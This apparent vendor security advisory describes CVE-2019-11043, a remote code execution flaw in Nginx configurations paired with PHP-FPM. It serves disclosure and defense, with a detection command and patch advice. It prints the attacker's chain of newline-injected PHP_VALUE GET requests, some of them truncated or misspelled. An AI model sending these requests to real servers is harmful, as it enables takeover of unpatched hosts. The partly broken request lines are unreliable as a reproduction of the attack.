PHP-FPM Vulnerability leads to Remote code execution

By

PHP-FPM (PHP Fast Process Manager) is a FastCGI handler for PHP scripts and applications, especially useful for busier sites. It’s commonly paired with web servers to serve applications which require a PHP framework, such as web forums or login gateways, while the web server returns HTML, JavaScript, and other non-PHP content.

FastCGI is a way to have CGI scripts execute time-consuming code (like opening a database) only once, rather than every time the script is loaded. It mainly helps to reduce the overhead related to interfacing between web server and CGI programs, allowing a server to handle more web page requests per unit of time.

Vulnerability | CVE-2019-11043
This vulnerability can be triggered only with the following Nginx configurations and only when NGINX is paired with PHP-FPM.  It allows the  FPM module to write past allocated buffers into the space reserved for FCGI protocol data, thus opening the possibility of remote code execution.

location ~ [^/]\.php(/|$) {
                  fastcgi_split_path_info ^(.+?\.php)(/.*)$;
                  fastcgi_param PATH_INFO $fastcgi_path_info;
                  fastcgi_pass php:9000;
                  …

The regexp in `fastcgi_split_path_info` directive can be broken using the newline character (%0a, in url encoded form). Broken regexp leads to empty PATH_INFO. While php-fpm handling PATH_INFO as empty, there is a logical flaw allowing attackers to create fake PHP_VALUE variables. Using this technique, attackers can create a chain of carefully chosen config values to get remote code execution.

Exploit:

The attacker’s requests look like the below ones:

GET /index.php/PHP_VALUE%0Asession.auto_sart=0;;;;
GET /index.php/PHP_VALUE%0Ahtml_errors=0;;;;;;;;;;
GET /index.php/PHP_VALUE%0Ainclude_path=/tmp;;;;;;
GET /index.php/PHP_VALUE%0Aauto_prepend_file=a;;;;
GET /index.php/PHP_VALUE%0Alog_errors=1;;;;;;;;;;;
GET /index.php/PHP_VALUE%0Aerror_reporting=2;;;;;;
GET /index.php/PHP_VALUE%0Aerror_log=/tmp/a;;;;;;;
GET /index.php/PHP_VALUE%0Aextension_dir=%22%3C%3F
GET /index.php/PHP_VALUE%0Aextension=%22$_GET%5Ba%

Fix:

Admins are advised to check whether their servers are vulnerable by executing a simple bash command:
                  egrep -Rin –color ‘fastcgi_split_path’ /etc/nginx/

It is recommended to upgrade to the patched release (or later) of your PHP version

SonicWALL Capture Labs Threat Research team provides protection against this threat with the following signature:

          IPS 14523: PHP-FPM NGINX Remote Code Execution

SonicWall WAF has been designed to provide protection against this exploit by default.

Security News
The SonicWall Capture Labs Threat Research Team gathers, analyzes and vets cross-vector threat information from the SonicWall Capture Threat network, consisting of global devices and resources, including more than 1 million security sensors in nearly 200 countries and territories. The research team identifies, analyzes, and mitigates critical vulnerabilities and malware daily through in-depth research, which drives protection for all SonicWall customers. In addition to safeguarding networks globally, the research team supports the larger threat intelligence community by releasing weekly deep technical analyses of the most critical threats to small businesses, providing critical knowledge that defenders need to protect their networks.